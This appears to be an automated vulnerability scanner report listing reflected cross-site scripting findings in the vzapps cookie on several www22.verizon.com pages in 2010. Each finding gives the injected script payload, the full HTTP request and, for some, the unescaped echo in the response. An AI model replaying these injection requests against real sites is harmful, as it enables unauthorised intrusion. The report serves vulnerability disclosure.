The value of the vzapps cookie is copied into the HTML document as plain text between tags. The payload c1b7b<script>alert(1)</script>28eee026df0 was submitted in the vzapps cookie. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Because the user data that is copied into the response is submitted within a cookie, the application's behaviour is not trivial to exploit in an attack against another user. Typically, you will need to find a means of setting an arbitrary cookie value in the victim's browser in order to exploit the vulnerability. This limitation considerably mitigates the impact of the vulnerability.
Request
GET /Residential/WiFi/ HTTP/1.1 Host: www22.verizon.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close Cookie: Source=CHSI; vzapps=STATE=TXc1b7b<script>alert(1)</script>28eee026df0; NSC_xxx22_tqmbu_mcw=ffffffffa54c16f345525d5f4f58455e445a4a423660; V347=38J7laQNGQyUQYebWyb8dnlR6FarQ_tWSvDOV9jHkc9v4p6lQXSPuJw; refURL=http://www22.verizon.com/Residential/HighSpeedInternet/HSIvsCable/HSIvsCable.htm?CMP=BAC-MXT_D_P2_CS_Z_Q_N_Z330; vsrecentsearches=%26%2339%3b%26%2339%3b~%26%2339%3b~~~; CP=null*; oo_learn=42336e023618bb8c0d4143d9db13d5e2~1; ASP.NET_SessionId=zj1l4v55cxoz4e55aa3kjqe3; ak-sf=false; CMS_TimeZoneOffset=360;
Response
HTTP/1.0 200 OK Server: Microsoft-IIS/6.0 X-Powered-By: ASP.NET X-AspNet-Version: 2.0.50727 Content-Type: text/html; charset=utf-8 Content-Length: 63717 Expires: Sat, 20 Nov 2010 00:12:26 GMT Cache-Control: max-age=0, no-cache, no-store Date: Sat, 20 Nov 2010 00:12:26 GMT Connection: close Set-Cookie: ContextInfo_State=TXc1b7b<script>alert(1)</script>28eee026df0; path=/
<html xmlns:vz> <head id="_ctl0_head"><title> Verizon | Internet | Wi-Fi </title><meta name="keywords" content="verizon internet services, verizon internet products, verizon wi-fi, ISP, internet ...[SNIP]... <DIV style="FLOAT: left" id=yourlocation>TXC1B7B<SCRIPT>ALERT(1)</SCRIPT>28EEE026DF0 </DIV> ...[SNIP]...
The value of the vzapps cookie is copied into the value of an HTML tag attribute which is encapsulated in single quotation marks. The payload 63a3c'><script>alert(1)</script>03a48b9a52e was submitted in the vzapps cookie. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Because the user data that is copied into the response is submitted within a cookie, the application's behaviour is not trivial to exploit in an attack against another user. Typically, you will need to find a means of setting an arbitrary cookie value in the victim's browser in order to exploit the vulnerability. This limitation considerably mitigates the impact of the vulnerability.
Request
GET /Residential/WiFi/ HTTP/1.1 Host: www22.verizon.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close Cookie: Source=CHSI; vzapps=STATE=TX63a3c'><script>alert(1)</script>03a48b9a52e; NSC_xxx22_tqmbu_mcw=ffffffffa54c16f345525d5f4f58455e445a4a423660; V347=38J7laQNGQyUQYebWyb8dnlR6FarQ_tWSvDOV9jHkc9v4p6lQXSPuJw; refURL=http://www22.verizon.com/Residential/HighSpeedInternet/HSIvsCable/HSIvsCable.htm?CMP=BAC-MXT_D_P2_CS_Z_Q_N_Z330; vsrecentsearches=%26%2339%3b%26%2339%3b~%26%2339%3b~~~; CP=null*; oo_learn=42336e023618bb8c0d4143d9db13d5e2~1; ASP.NET_SessionId=zj1l4v55cxoz4e55aa3kjqe3; ak-sf=false; CMS_TimeZoneOffset=360;
Response
HTTP/1.0 200 OK Server: Microsoft-IIS/6.0 X-Powered-By: ASP.NET X-AspNet-Version: 2.0.50727 Content-Type: text/html; charset=utf-8 Content-Length: 63721 Expires: Sat, 20 Nov 2010 00:12:11 GMT Cache-Control: max-age=0, no-cache, no-store Date: Sat, 20 Nov 2010 00:12:11 GMT Connection: close Set-Cookie: ContextInfo_State=TX63a3c'><script>alert(1)</script>03a48b9a52e; path=/
<html xmlns:vz> <head id="_ctl0_head"><title> Verizon | Internet | Wi-Fi </title><meta name="keywords" content="verizon internet services, verizon internet products, verizon wi-fi, ISP, internet ...[SNIP]... <input type='hidden' id='locationInfo' value='TX63A3C'><SCRIPT>ALERT(1)</SCRIPT>03A48B9A52E ' /> ...[SNIP]...
The value of the vzapps cookie is copied into the HTML document as plain text between tags. The payload 5782f<script>alert(1)</script>042ef7a5b1d was submitted in the vzapps cookie. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Because the user data that is copied into the response is submitted within a cookie, the application's behaviour is not trivial to exploit in an attack against another user. Typically, you will need to find a means of setting an arbitrary cookie value in the victim's browser in order to exploit the vulnerability. This limitation considerably mitigates the impact of the vulnerability.
Request
GET /Residential/WiFi/HowToGetIt HTTP/1.1 Host: www22.verizon.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close Cookie: Source=CHSI; vzapps=STATE=TX5782f<script>alert(1)</script>042ef7a5b1d; NSC_xxx22_tqmbu_mcw=ffffffffa54c16f345525d5f4f58455e445a4a423660; V347=38J7laQNGQyUQYebWyb8dnlR6FarQ_tWSvDOV9jHkc9v4p6lQXSPuJw; refURL=http://www22.verizon.com/Residential/HighSpeedInternet/HSIvsCable/HSIvsCable.htm?CMP=BAC-MXT_D_P2_CS_Z_Q_N_Z330; vsrecentsearches=%26%2339%3b%26%2339%3b~%26%2339%3b~~~; CP=null*; oo_learn=42336e023618bb8c0d4143d9db13d5e2~1; ASP.NET_SessionId=zj1l4v55cxoz4e55aa3kjqe3; ak-sf=false; CMS_TimeZoneOffset=360;
Response
HTTP/1.0 200 OK Server: Microsoft-IIS/6.0 X-Powered-By: ASP.NET X-AspNet-Version: 2.0.50727 Content-Type: text/html; charset=utf-8 Content-Length: 65807 Expires: Sat, 20 Nov 2010 00:11:42 GMT Cache-Control: max-age=0, no-cache, no-store Date: Sat, 20 Nov 2010 00:11:42 GMT Connection: close Set-Cookie: ContextInfo_State=TX5782f<script>alert(1)</script>042ef7a5b1d; path=/
<html xmlns:vz> <head id="_ctl0_head"><title> Verizon | Internet | Wi-Fi: How to Get It </title><meta name="keywords" content="verizon internet services, verizon internet products, verizon wi-fi ...[SNIP]... <DIV style="FLOAT: left" id=yourlocation>TX5782F<SCRIPT>ALERT(1)</SCRIPT>042EF7A5B1D </DIV> ...[SNIP]...
The value of the vzapps cookie is copied into the value of an HTML tag attribute which is encapsulated in single quotation marks. The payload 9067c'><script>alert(1)</script>8e4bfe5a6f4 was submitted in the vzapps cookie. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Because the user data that is copied into the response is submitted within a cookie, the application's behaviour is not trivial to exploit in an attack against another user. Typically, you will need to find a means of setting an arbitrary cookie value in the victim's browser in order to exploit the vulnerability. This limitation considerably mitigates the impact of the vulnerability.
Request
GET /Residential/WiFi/HowToGetIt HTTP/1.1 Host: www22.verizon.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close Cookie: Source=CHSI; vzapps=STATE=TX9067c'><script>alert(1)</script>8e4bfe5a6f4; NSC_xxx22_tqmbu_mcw=ffffffffa54c16f345525d5f4f58455e445a4a423660; V347=38J7laQNGQyUQYebWyb8dnlR6FarQ_tWSvDOV9jHkc9v4p6lQXSPuJw; refURL=http://www22.verizon.com/Residential/HighSpeedInternet/HSIvsCable/HSIvsCable.htm?CMP=BAC-MXT_D_P2_CS_Z_Q_N_Z330; vsrecentsearches=%26%2339%3b%26%2339%3b~%26%2339%3b~~~; CP=null*; oo_learn=42336e023618bb8c0d4143d9db13d5e2~1; ASP.NET_SessionId=zj1l4v55cxoz4e55aa3kjqe3; ak-sf=false; CMS_TimeZoneOffset=360;
Response
HTTP/1.0 200 OK Server: Microsoft-IIS/6.0 X-Powered-By: ASP.NET X-AspNet-Version: 2.0.50727 Content-Type: text/html; charset=utf-8 Content-Length: 65811 Expires: Sat, 20 Nov 2010 00:11:37 GMT Cache-Control: max-age=0, no-cache, no-store Date: Sat, 20 Nov 2010 00:11:37 GMT Connection: close Set-Cookie: ContextInfo_State=TX9067c'><script>alert(1)</script>8e4bfe5a6f4; path=/
<html xmlns:vz> <head id="_ctl0_head"><title> Verizon | Internet | Wi-Fi: How to Get It </title><meta name="keywords" content="verizon internet services, verizon internet products, verizon wi-fi ...[SNIP]... <input type='hidden' id='locationInfo' value='TX9067C'><SCRIPT>ALERT(1)</SCRIPT>8E4BFE5A6F4 ' /> ...[SNIP]...
The value of the vzapps cookie is copied into the HTML document as plain text between tags. The payload cb6db<script>alert(1)</script>2abfc7b8635 was submitted in the vzapps cookie. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Because the user data that is copied into the response is submitted within a cookie, the application's behaviour is not trivial to exploit in an attack against another user. Typically, you will need to find a means of setting an arbitrary cookie value in the victim's browser in order to exploit the vulnerability. This limitation considerably mitigates the impact of the vulnerability.
Request
GET /Residential/aboutFiOS/Overview.htm HTTP/1.1 Host: www22.verizon.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close Cookie: Source=CHSI; vzapps=STATE=TXcb6db<script>alert(1)</script>2abfc7b8635; NSC_xxx22_tqmbu_mcw=ffffffffa54c16f345525d5f4f58455e445a4a423660; V347=38J7laQNGQyUQYebWyb8dnlR6FarQ_tWSvDOV9jHkc9v4p6lQXSPuJw; refURL=http://www22.verizon.com/Residential/HighSpeedInternet/HSIvsCable/HSIvsCable.htm?CMP=BAC-MXT_D_P2_CS_Z_Q_N_Z330; vsrecentsearches=%26%2339%3b%26%2339%3b~%26%2339%3b~~~; CP=null*; oo_learn=42336e023618bb8c0d4143d9db13d5e2~1; ASP.NET_SessionId=zj1l4v55cxoz4e55aa3kjqe3; ak-sf=false; CMS_TimeZoneOffset=360;
The value of the vzapps cookie is copied into the value of an HTML tag attribute which is encapsulated in single quotation marks. The payload b381b'><script>alert(1)</script>ce796c23fc was submitted in the vzapps cookie. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Because the user data that is copied into the response is submitted within a cookie, the application's behaviour is not trivial to exploit in an attack against another user. Typically, you will need to find a means of setting an arbitrary cookie value in the victim's browser in order to exploit the vulnerability. This limitation considerably mitigates the impact of the vulnerability.
Request
GET /Residential/aboutFiOS/Overview.htm HTTP/1.1 Host: www22.verizon.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close Cookie: Source=CHSI; vzapps=STATE=TXb381b'><script>alert(1)</script>ce796c23fc; NSC_xxx22_tqmbu_mcw=ffffffffa54c16f345525d5f4f58455e445a4a423660; V347=38J7laQNGQyUQYebWyb8dnlR6FarQ_tWSvDOV9jHkc9v4p6lQXSPuJw; refURL=http://www22.verizon.com/Residential/HighSpeedInternet/HSIvsCable/HSIvsCable.htm?CMP=BAC-MXT_D_P2_CS_Z_Q_N_Z330; vsrecentsearches=%26%2339%3b%26%2339%3b~%26%2339%3b~~~; CP=null*; oo_learn=42336e023618bb8c0d4143d9db13d5e2~1; ASP.NET_SessionId=zj1l4v55cxoz4e55aa3kjqe3; ak-sf=false; CMS_TimeZoneOffset=360;
The value of the vzapps cookie is copied into the value of an HTML tag attribute which is encapsulated in single quotation marks. The payload ab065'><script>alert(1)</script>e9047e9551f was submitted in the vzapps cookie. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Because the user data that is copied into the response is submitted within a cookie, the application's behaviour is not trivial to exploit in an attack against another user. Typically, you will need to find a means of setting an arbitrary cookie value in the victim's browser in order to exploit the vulnerability. This limitation considerably mitigates the impact of the vulnerability.
Request
GET /Residential/aboutFiOS/labs/labs.htm HTTP/1.1 Host: www22.verizon.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close Cookie: Source=CHSI; vzapps=STATE=TXab065'><script>alert(1)</script>e9047e9551f; NSC_xxx22_tqmbu_mcw=ffffffffa54c16f345525d5f4f58455e445a4a423660; V347=38J7laQNGQyUQYebWyb8dnlR6FarQ_tWSvDOV9jHkc9v4p6lQXSPuJw; refURL=http://www22.verizon.com/Residential/HighSpeedInternet/HSIvsCable/HSIvsCable.htm?CMP=BAC-MXT_D_P2_CS_Z_Q_N_Z330; vsrecentsearches=%26%2339%3b%26%2339%3b~%26%2339%3b~~~; CP=null*; oo_learn=42336e023618bb8c0d4143d9db13d5e2~1; ASP.NET_SessionId=zj1l4v55cxoz4e55aa3kjqe3; ak-sf=false; CMS_TimeZoneOffset=360;
The value of the vzapps cookie is copied into the HTML document as plain text between tags. The payload 3e936<script>alert(1)</script>c5abaf729ed was submitted in the vzapps cookie. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Because the user data that is copied into the response is submitted within a cookie, the application's behaviour is not trivial to exploit in an attack against another user. Typically, you will need to find a means of setting an arbitrary cookie value in the victim's browser in order to exploit the vulnerability. This limitation considerably mitigates the impact of the vulnerability.
Request
GET /Residential/aboutFiOS/labs/labs.htm HTTP/1.1 Host: www22.verizon.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close Cookie: Source=CHSI; vzapps=STATE=TX3e936<script>alert(1)</script>c5abaf729ed; NSC_xxx22_tqmbu_mcw=ffffffffa54c16f345525d5f4f58455e445a4a423660; V347=38J7laQNGQyUQYebWyb8dnlR6FarQ_tWSvDOV9jHkc9v4p6lQXSPuJw; refURL=http://www22.verizon.com/Residential/HighSpeedInternet/HSIvsCable/HSIvsCable.htm?CMP=BAC-MXT_D_P2_CS_Z_Q_N_Z330; vsrecentsearches=%26%2339%3b%26%2339%3b~%26%2339%3b~~~; CP=null*; oo_learn=42336e023618bb8c0d4143d9db13d5e2~1; ASP.NET_SessionId=zj1l4v55cxoz4e55aa3kjqe3; ak-sf=false; CMS_TimeZoneOffset=360;
The value of the vzapps cookie is copied into the value of an HTML tag attribute which is encapsulated in single quotation marks. The payload 26326'><script>alert(1)</script>0d04466e0c9 was submitted in the vzapps cookie. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Because the user data that is copied into the response is submitted within a cookie, the application's behaviour is not trivial to exploit in an attack against another user. Typically, you will need to find a means of setting an arbitrary cookie value in the victim's browser in order to exploit the vulnerability. This limitation considerably mitigates the impact of the vulnerability.
Request
GET /Residential/aboutFiOS/reviews/reviews.htm HTTP/1.1 Host: www22.verizon.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close Cookie: Source=CHSI; vzapps=STATE=TX26326'><script>alert(1)</script>0d04466e0c9; NSC_xxx22_tqmbu_mcw=ffffffffa54c16f345525d5f4f58455e445a4a423660; V347=38J7laQNGQyUQYebWyb8dnlR6FarQ_tWSvDOV9jHkc9v4p6lQXSPuJw; refURL=http://www22.verizon.com/Residential/HighSpeedInternet/HSIvsCable/HSIvsCable.htm?CMP=BAC-MXT_D_P2_CS_Z_Q_N_Z330; vsrecentsearches=%26%2339%3b%26%2339%3b~%26%2339%3b~~~; CP=null*; oo_learn=42336e023618bb8c0d4143d9db13d5e2~1; ASP.NET_SessionId=zj1l4v55cxoz4e55aa3kjqe3; ak-sf=false; CMS_TimeZoneOffset=360;
The value of the vzapps cookie is copied into the HTML document as plain text between tags. The payload dd3b4<script>alert(1)</script>757b9633f3c was submitted in the vzapps cookie. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Because the user data that is copied into the response is submitted within a cookie, the application's behaviour is not trivial to exploit in an attack against another user. Typically, you will need to find a means of setting an arbitrary cookie value in the victim's browser in order to exploit the vulnerability. This limitation considerably mitigates the impact of the vulnerability.
Request
GET /Residential/aboutFiOS/reviews/reviews.htm HTTP/1.1 Host: www22.verizon.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close Cookie: Source=CHSI; vzapps=STATE=TXdd3b4<script>alert(1)</script>757b9633f3c; NSC_xxx22_tqmbu_mcw=ffffffffa54c16f345525d5f4f58455e445a4a423660; V347=38J7laQNGQyUQYebWyb8dnlR6FarQ_tWSvDOV9jHkc9v4p6lQXSPuJw; refURL=http://www22.verizon.com/Residential/HighSpeedInternet/HSIvsCable/HSIvsCable.htm?CMP=BAC-MXT_D_P2_CS_Z_Q_N_Z330; vsrecentsearches=%26%2339%3b%26%2339%3b~%26%2339%3b~~~; CP=null*; oo_learn=42336e023618bb8c0d4143d9db13d5e2~1; ASP.NET_SessionId=zj1l4v55cxoz4e55aa3kjqe3; ak-sf=false; CMS_TimeZoneOffset=360;
The value of the vzapps cookie is copied into the value of an HTML tag attribute which is encapsulated in single quotation marks. The payload a49de'><script>alert(1)</script>ec31fe281d2 was submitted in the vzapps cookie. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Because the user data that is copied into the response is submitted within a cookie, the application's behaviour is not trivial to exploit in an attack against another user. Typically, you will need to find a means of setting an arbitrary cookie value in the victim's browser in order to exploit the vulnerability. This limitation considerably mitigates the impact of the vulnerability.
Request
GET /Residential/aboutFiOS/widgets/widgets.htm HTTP/1.1 Host: www22.verizon.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close Cookie: Source=CHSI; vzapps=STATE=TXa49de'><script>alert(1)</script>ec31fe281d2; NSC_xxx22_tqmbu_mcw=ffffffffa54c16f345525d5f4f58455e445a4a423660; V347=38J7laQNGQyUQYebWyb8dnlR6FarQ_tWSvDOV9jHkc9v4p6lQXSPuJw; refURL=http://www22.verizon.com/Residential/HighSpeedInternet/HSIvsCable/HSIvsCable.htm?CMP=BAC-MXT_D_P2_CS_Z_Q_N_Z330; vsrecentsearches=%26%2339%3b%26%2339%3b~%26%2339%3b~~~; CP=null*; oo_learn=42336e023618bb8c0d4143d9db13d5e2~1; ASP.NET_SessionId=zj1l4v55cxoz4e55aa3kjqe3; ak-sf=false; CMS_TimeZoneOffset=360;
The value of the vzapps cookie is copied into the HTML document as plain text between tags. The payload 202c8<script>alert(1)</script>a033bcd02b5 was submitted in the vzapps cookie. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Because the user data that is copied into the response is submitted within a cookie, the application's behaviour is not trivial to exploit in an attack against another user. Typically, you will need to find a means of setting an arbitrary cookie value in the victim's browser in order to exploit the vulnerability. This limitation considerably mitigates the impact of the vulnerability.
Request
GET /Residential/aboutFiOS/widgets/widgets.htm HTTP/1.1 Host: www22.verizon.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close Cookie: Source=CHSI; vzapps=STATE=TX202c8<script>alert(1)</script>a033bcd02b5; NSC_xxx22_tqmbu_mcw=ffffffffa54c16f345525d5f4f58455e445a4a423660; V347=38J7laQNGQyUQYebWyb8dnlR6FarQ_tWSvDOV9jHkc9v4p6lQXSPuJw; refURL=http://www22.verizon.com/Residential/HighSpeedInternet/HSIvsCable/HSIvsCable.htm?CMP=BAC-MXT_D_P2_CS_Z_Q_N_Z330; vsrecentsearches=%26%2339%3b%26%2339%3b~%26%2339%3b~~~; CP=null*; oo_learn=42336e023618bb8c0d4143d9db13d5e2~1; ASP.NET_SessionId=zj1l4v55cxoz4e55aa3kjqe3; ak-sf=false; CMS_TimeZoneOffset=360;
The value of the vzapps cookie is copied into the value of an HTML tag attribute which is encapsulated in single quotation marks. The payload c8020'><script>alert(1)</script>7e15a2d3a4 was submitted in the vzapps cookie. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Note that a redirection occurred between the attack request and the response containing the echoed input. It is necessary to follow this redirection for the attack to succeed. When the attack is carried out via a browser, the redirection will be followed automatically.
Because the user data that is copied into the response is submitted within a cookie, the application's behaviour is not trivial to exploit in an attack against another user. Typically, you will need to find a means of setting an arbitrary cookie value in the victim's browser in order to exploit the vulnerability. This limitation considerably mitigates the impact of the vulnerability.
Request
GET /residential/bundles/bundlesoverview/bundlesoverview.htm HTTP/1.1 Host: www22.verizon.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close Cookie: Source=CHSI; vzapps=STATE=TXc8020'><script>alert(1)</script>7e15a2d3a4; NSC_xxx22_tqmbu_mcw=ffffffffa54c16f345525d5f4f58455e445a4a423660; V347=38J7laQNGQyUQYebWyb8dnlR6FarQ_tWSvDOV9jHkc9v4p6lQXSPuJw; refURL=http://www22.verizon.com/Residential/HighSpeedInternet/HSIvsCable/HSIvsCable.htm?CMP=BAC-MXT_D_P2_CS_Z_Q_N_Z330; vsrecentsearches=%26%2339%3b%26%2339%3b~%26%2339%3b~~~; CP=null*; oo_learn=42336e023618bb8c0d4143d9db13d5e2~1; ASP.NET_SessionId=zj1l4v55cxoz4e55aa3kjqe3; ak-sf=false; CMS_TimeZoneOffset=360;
The value of the vzapps cookie is copied into the HTML document as plain text between tags. The payload 4afcd<script>alert(1)</script>f5636ef73be was submitted in the vzapps cookie. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Note that a redirection occurred between the attack request and the response containing the echoed input. It is necessary to follow this redirection for the attack to succeed. When the attack is carried out via a browser, the redirection will be followed automatically.
Because the user data that is copied into the response is submitted within a cookie, the application's behaviour is not trivial to exploit in an attack against another user. Typically, you will need to find a means of setting an arbitrary cookie value in the victim's browser in order to exploit the vulnerability. This limitation considerably mitigates the impact of the vulnerability.
Request
GET /residential/bundles/bundlesoverview/bundlesoverview.htm HTTP/1.1 Host: www22.verizon.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close Cookie: Source=CHSI; vzapps=STATE=TX4afcd<script>alert(1)</script>f5636ef73be; NSC_xxx22_tqmbu_mcw=ffffffffa54c16f345525d5f4f58455e445a4a423660; V347=38J7laQNGQyUQYebWyb8dnlR6FarQ_tWSvDOV9jHkc9v4p6lQXSPuJw; refURL=http://www22.verizon.com/Residential/HighSpeedInternet/HSIvsCable/HSIvsCable.htm?CMP=BAC-MXT_D_P2_CS_Z_Q_N_Z330; vsrecentsearches=%26%2339%3b%26%2339%3b~%26%2339%3b~~~; CP=null*; oo_learn=42336e023618bb8c0d4143d9db13d5e2~1; ASP.NET_SessionId=zj1l4v55cxoz4e55aa3kjqe3; ak-sf=false; CMS_TimeZoneOffset=360;
The value of the vzapps cookie is copied into the HTML document as plain text between tags. The payload e9210<script>alert(1)</script>17637724fdd was submitted in the vzapps cookie. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Because the user data that is copied into the response is submitted within a cookie, the application's behaviour is not trivial to exploit in an attack against another user. Typically, you will need to find a means of setting an arbitrary cookie value in the victim's browser in order to exploit the vulnerability. This limitation considerably mitigates the impact of the vulnerability.
Request
GET /residential/bundles/overview HTTP/1.1 Host: www22.verizon.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close Cookie: Source=CHSI; vzapps=STATE=TXe9210<script>alert(1)</script>17637724fdd; NSC_xxx22_tqmbu_mcw=ffffffffa54c16f345525d5f4f58455e445a4a423660; V347=38J7laQNGQyUQYebWyb8dnlR6FarQ_tWSvDOV9jHkc9v4p6lQXSPuJw; refURL=http://www22.verizon.com/Residential/HighSpeedInternet/HSIvsCable/HSIvsCable.htm?CMP=BAC-MXT_D_P2_CS_Z_Q_N_Z330; vsrecentsearches=%26%2339%3b%26%2339%3b~%26%2339%3b~~~; CP=null*; oo_learn=42336e023618bb8c0d4143d9db13d5e2~1; ASP.NET_SessionId=zj1l4v55cxoz4e55aa3kjqe3; ak-sf=false; CMS_TimeZoneOffset=360;
The value of the vzapps cookie is copied into the value of an HTML tag attribute which is encapsulated in single quotation marks. The payload 4e8e6'><script>alert(1)</script>b8d520065ab was submitted in the vzapps cookie. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Because the user data that is copied into the response is submitted within a cookie, the application's behaviour is not trivial to exploit in an attack against another user. Typically, you will need to find a means of setting an arbitrary cookie value in the victim's browser in order to exploit the vulnerability. This limitation considerably mitigates the impact of the vulnerability.
Request
GET /residential/bundles/overview HTTP/1.1 Host: www22.verizon.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close Cookie: Source=CHSI; vzapps=STATE=TX4e8e6'><script>alert(1)</script>b8d520065ab; NSC_xxx22_tqmbu_mcw=ffffffffa54c16f345525d5f4f58455e445a4a423660; V347=38J7laQNGQyUQYebWyb8dnlR6FarQ_tWSvDOV9jHkc9v4p6lQXSPuJw; refURL=http://www22.verizon.com/Residential/HighSpeedInternet/HSIvsCable/HSIvsCable.htm?CMP=BAC-MXT_D_P2_CS_Z_Q_N_Z330; vsrecentsearches=%26%2339%3b%26%2339%3b~%26%2339%3b~~~; CP=null*; oo_learn=42336e023618bb8c0d4143d9db13d5e2~1; ASP.NET_SessionId=zj1l4v55cxoz4e55aa3kjqe3; ak-sf=false; CMS_TimeZoneOffset=360;
The value of the vzapps cookie is copied into the HTML document as plain text between tags. The payload 6913f<script>alert(1)</script>c0ed5cd13fb was submitted in the vzapps cookie. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Because the user data that is copied into the response is submitted within a cookie, the application's behaviour is not trivial to exploit in an attack against another user. Typically, you will need to find a means of setting an arbitrary cookie value in the victim's browser in order to exploit the vulnerability. This limitation considerably mitigates the impact of the vulnerability.
Request
GET /residential/internet HTTP/1.1 Host: www22.verizon.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close Cookie: Source=CHSI; vzapps=STATE=TX6913f<script>alert(1)</script>c0ed5cd13fb; NSC_xxx22_tqmbu_mcw=ffffffffa54c16f345525d5f4f58455e445a4a423660; V347=38J7laQNGQyUQYebWyb8dnlR6FarQ_tWSvDOV9jHkc9v4p6lQXSPuJw; refURL=http://www22.verizon.com/Residential/HighSpeedInternet/HSIvsCable/HSIvsCable.htm?CMP=BAC-MXT_D_P2_CS_Z_Q_N_Z330; vsrecentsearches=%26%2339%3b%26%2339%3b~%26%2339%3b~~~; CP=null*; oo_learn=42336e023618bb8c0d4143d9db13d5e2~1; ASP.NET_SessionId=zj1l4v55cxoz4e55aa3kjqe3; ak-sf=false; CMS_TimeZoneOffset=360;
Response
HTTP/1.0 200 OK Server: Microsoft-IIS/6.0 X-Powered-By: ASP.NET X-AspNet-Version: 2.0.50727 Content-Type: text/html; charset=utf-8 Content-Length: 73111 Expires: Sat, 20 Nov 2010 00:16:32 GMT Cache-Control: max-age=0, no-cache, no-store Date: Sat, 20 Nov 2010 00:16:32 GMT Connection: close Set-Cookie: ContextInfo_State=TX6913f<script>alert(1)</script>c0ed5cd13fb; path=/ Set-Cookie: ContextInfo_LoopQual=; path=/
<html xmlns:vz> <head id="_ctl0_head"><title> Verizon | Internet </title><meta name="keywords" content="verizon internet services, verizon internet products, ISP, internet service, fios internet ...[SNIP]... <DIV style="FLOAT: left" id=yourlocation>TX6913F<SCRIPT>ALERT(1)</SCRIPT>C0ED5CD13FB </DIV> ...[SNIP]...
The value of the vzapps cookie is copied into the value of an HTML tag attribute which is encapsulated in single quotation marks. The payload bf607'><script>alert(1)</script>af83f93894c was submitted in the vzapps cookie. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Because the user data that is copied into the response is submitted within a cookie, the application's behaviour is not trivial to exploit in an attack against another user. Typically, you will need to find a means of setting an arbitrary cookie value in the victim's browser in order to exploit the vulnerability. This limitation considerably mitigates the impact of the vulnerability.
Request
GET /residential/internet HTTP/1.1 Host: www22.verizon.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close Cookie: Source=CHSI; vzapps=STATE=TXbf607'><script>alert(1)</script>af83f93894c; NSC_xxx22_tqmbu_mcw=ffffffffa54c16f345525d5f4f58455e445a4a423660; V347=38J7laQNGQyUQYebWyb8dnlR6FarQ_tWSvDOV9jHkc9v4p6lQXSPuJw; refURL=http://www22.verizon.com/Residential/HighSpeedInternet/HSIvsCable/HSIvsCable.htm?CMP=BAC-MXT_D_P2_CS_Z_Q_N_Z330; vsrecentsearches=%26%2339%3b%26%2339%3b~%26%2339%3b~~~; CP=null*; oo_learn=42336e023618bb8c0d4143d9db13d5e2~1; ASP.NET_SessionId=zj1l4v55cxoz4e55aa3kjqe3; ak-sf=false; CMS_TimeZoneOffset=360;
Response
